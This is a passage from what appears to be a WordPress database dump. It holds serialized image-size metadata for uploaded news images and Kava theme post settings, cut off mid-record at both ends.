0:\"image/jpeg\";s:8:\"filesize\";i:23384;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"today-news-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207925;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"today-news-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8624;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"today-news-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126315;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"today-news-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:404117;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"today-news-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32761;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:21:\"today-news-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5761;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:22:\"today-news-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18270;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:22:\"today-news-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51635;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:22:\"today-news-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60226;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:22:\"today-news-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78962;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:23:\"today-news-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:196281;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:24:\"today-news-1600x1080.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:435544;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:22:\"today-news-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82290;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:22:\"today-news-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116870;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:23:\"today-news-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203673;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39282,5907,'_wp_attached_file','2026/05/epa-errs.jpg'),(39252,5902,'_wp_old_date','2026-05-26'),(39253,5902,'_thumbnail_id','5904'),(39254,5902,'_edit_last','38'),(39255,5902,'kava_extra_enable_breadcrumbs','inherit'),(39256,5902,'post_formats',''),(39257,5902,'gallery_tab',''),(39258,5902,'kava_extra_gallery_images',''),(39259,5902,'link_tab',''),(39260,5902,'kava_extra_link',''),(39261,5902,'kava_extra_link_target','_blank'),(39262,5902,'quote_tab',''),(39263,5902,'kava_extra_quote_text',''),(39264,5902,'kava_extra_quote_cite',''),(39265,5902,'audio_tab',''),(39266,5902,'kava_extra_audio',''),(39267,5902,'kava_extra_audio_loop','false'),(39268,5902,'kava_extra_audio_autoplay','false'),(39269,5902,'kava_extra_audio_preload','false'),(39270,5902,'video_tab',''),(39271,5902,'kava_extra_video_type','library'),(39272,5902,'kava_extra_video_library',''),(39273,5902,'kava_extra_video_external',''),(39274,5902,'kava_extra_video_poster',''),(39275,5902,'kava_extra_video_width','770'),(39276,5902,'kava_extra_video_height','480'),(39277,5902,'kava_extra_video_loop','false'),(39278,5902,'kava_extra_video_autoplay','false'),(39279,5902,'kava_extra_video_preload','false'),(39283,5907,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:20:\"2026/05/epa-errs.jpg\";s:8:\"filesize\";i:352943;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"epa-errs-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25951;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"epa-errs-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212977;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"epa-errs-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9693;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"epa-errs-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132212;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:22:\"epa-errs-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:406500;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"epa-errs-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36154;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:19:\"epa-errs-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6296;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:20:\"epa-errs-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20113;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:20:\"epa-errs-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52798;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:20:\"epa-errs-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56219;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:20:\"epa-errs-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83895;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:21:\"epa-errs-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:202800;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:22:\"epa-errs-1600x1080.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:439276;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:20:\"epa-errs-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88198;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:20:\"epa-errs-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113027;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:21:\"epa-errs-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207028;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39284,5908,'_wp_attached_file','2026/05/new-epa1.jpg'),(39285,5908,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:20:\"2026/05/new-epa1.jpg\";s:8:\"filesize\";i:250760;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"new-epa1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18830;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"new-epa1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152174;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"new-epa1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9407;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"new-epa1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93922;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"new-epa1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:294605;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"new-epa1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33422;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:19:\"new-epa1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5967;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:20:\"new-epa1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19160;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:20:\"new-epa1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48929;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:20:\"new-epa1-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54004;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:20:\"new-epa1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79457;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:21:\"new-epa1-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:188945;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:20:\"new-epa1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62206;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:20:\"new-epa1-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108444;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:21:\"new-epa1-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:198978;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39290,5906,'_edit_last','38'),(39288,5906,'_wp_old_date','2026-05-26'),(39289,5906,'_thumbnail_id','5908'),(39318,5910,'_edit_lock','1779807140:38'),(39293,5906,'kava_extra_enable_breadcrumbs','inherit'),(39294,5906,'post_formats',''),(39295,5906,'gallery_tab',''),(39296,5906,'kava_extra_gallery_images',''),(39297,5906,'link_tab',''),(39298,5906,'kava_extra_link',''),(39299,5906,'kava_extra_link_target','_blank'),(39300,5906,'quote_tab',''),(39301,5906,'kava_extra_quote_text',''),(39302,5906,'kava_extra_quote_cite',''),(39303,5906,'audio_tab',''),(39304,5906,'kava_extra_audio',''),(39305,5906,'kava_extra_audio_loop','false'),(39306,5906,'kava_extra_audio_autoplay','false'),(39307,5906,'kava_extra_audio_preload','false'),(39308,5906,'video_tab',''),(39309,5906,'kava_extra_video_type','library'),(39310,5906,'kava_extra_video_library',''),(39311,5906,'kava_extra_video_external',''),(39312,5906,'kava_extra_video_poster',''),(39313,5906,'kava_extra_video_width','770'),(39314,5906,'kava_extra_video_height','480'),(39315,5906,'kava_extra_video_loop','false'),(39316,5906,'kava_extra_video_autoplay','false'),(39317,5906,'kava_extra_video_preload','false'),(39319,5910,'_last_editor_used_jetpack','block-editor'),(39320,5911,'_wp_attached_file','2026/05/epa-news-ce.jpg'),(39321,5911,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:23:\"2026/05/epa-news-ce.jpg\";s:8:\"filesize\";i:592300;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"epa-news-ce-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30029;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"epa-news-ce-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:302540;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"epa-news-ce-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10753;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"epa-news-ce-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:178448;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"epa-news-ce-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:604258;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"epa-news-ce-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42928;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:22:\"epa-news-ce-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6592;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:23:\"epa-news-ce-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23667;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:23:\"epa-news-ce-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68554;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:23:\"epa-news-ce-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76376;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:23:\"epa-news-ce-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107936;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:24:\"epa-news-ce-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:292540;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:25:\"epa-news-ce-1600x1080.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:683189;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:23:\"epa-news-ce-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113154;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:23:\"epa-news-ce-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161551;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:24:\"epa-news-ce-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:304524;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39322,5912,'_wp_attached_file','2026/05/epa-news-cand-e.jpg'),(39323,5912,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:27:\"2026/05/epa-news-cand-e.jpg\";s:8:\"filesize\";i:571641;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"epa-news-cand-e-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30276;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"epa-news-cand-e-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:310703;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"epa-news-cand-e-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10405;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"epa-news-cand-e-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:186998;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:29:\"epa-news-cand-e-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:598621;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"epa-news-cand-e-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44018;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:26:\"epa-news-cand-e-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6265;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:27:\"epa-news-cand-e-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23579;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:27:\"epa-news-cand-e-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71248;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:27:\"epa-news-cand-e-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83254;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:27:\"epa-news-cand-e-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113297;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:28:\"epa-news-cand-e-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:297346;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:29:\"epa-news-cand-e-1600x1080.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:653972;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:27:\"epa-news-cand-e-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118876;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:27:\"epa-news-cand-e-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166971;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:28:\"epa-news-cand-e-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:307387;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39328,5910,'_edit_last','38'),(39326,5910,'_wp_old_date','2026-05-26'),(39327,5910,'_thumbnail_id','5911'),(39425,5930,'_edit_last','38'),(39331,5910,'kava_extra_enable_breadcrumbs','inherit'),(39332,5910,'post_formats',''),(39333,5910,'gallery_tab',''),(39334,5910,'kava_extra_gallery_images',''),(39335,5910,'link_tab',''),(39336,5910,'kava_extra_link',''),(39337,5910,'kava_extra_link_target','_blank'),(39338,5910,'quote_tab',''),(39339,5910,'kava_extra_quote_text',''),(39340,5910,'kava_extra_quote_cite',''),(39341,5910,'audio_tab',''),(39342,5910,'kava_extra_audio',''),(39343,5910,'kava_extra_audio_loop','false'),(39344,5910,'kava_extra_audio_autoplay','false'),(39345,5910,'kava_extra_audio_preload','false'),(39346,5910,'video_tab',''),(39347,5910,'kava_extra_video_type','library'),(39348,5910,'kava_extra_video_library',''),(39349,5910,'kava_extra_video_external',''),(39350,5910,'kava_extra_video_poster',''),(39351,5910,'kava_extra_video_width','770'),(39352,5910,'kava_extra_video_height','480'),(39353,5910,'kava_extra_video_loop','false'),(39354,5910,'kava_extra_video_autoplay','false'),(39355,5910,'kava_extra_video_preload','false'),(39356,5914,'_edit_lock','1779807372:38'),(39357,5914,'_last_editor_used_jetpack','block-editor'),(39358,5915,'_last_editor_used_jetpack','classic-editor'),(39359,5915,'_edit_lock','1779901165:38'),(39360,5915,'_edit_last','38'),(39361,5916,'_wp_attached_file','2026/05/Screenshot-2026-05-27-at-16.46.50.png'),(39362,5916,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1102;s:6:\"height\";i:1370;s:4:\"file\";s:45:\"2026/05/Screenshot-2026-05-27-at-16.46.50.png\";s:8:\"filesize\";i:466274;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-16.46.50-241x300.png\";s:5:\"width\";i:241;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28952;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-27-at-16.46.50-824x1024.png\";s:5:\"width\";i:824;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:234961;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-16.46.50-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11791;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-16.46.50-768x955.png\";s:5:\"width\";i:768;s:6:\"height\";i:955;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:209038;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-16.46.50-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51287;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2026-05-27-at-16.46.50-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8729;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-16.46.50-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24648;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-16.46.50-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65271;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-16.46.50-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:68420;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-05-27-at-16.46.50-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:111322;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-05-27-at-16.46.50-1102x650.png\";s:5:\"width\";i:1102;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:317212;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-05-27-at-16.46.50-1102x1080.png\";s:5:\"width\";i:1102;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:375388;}s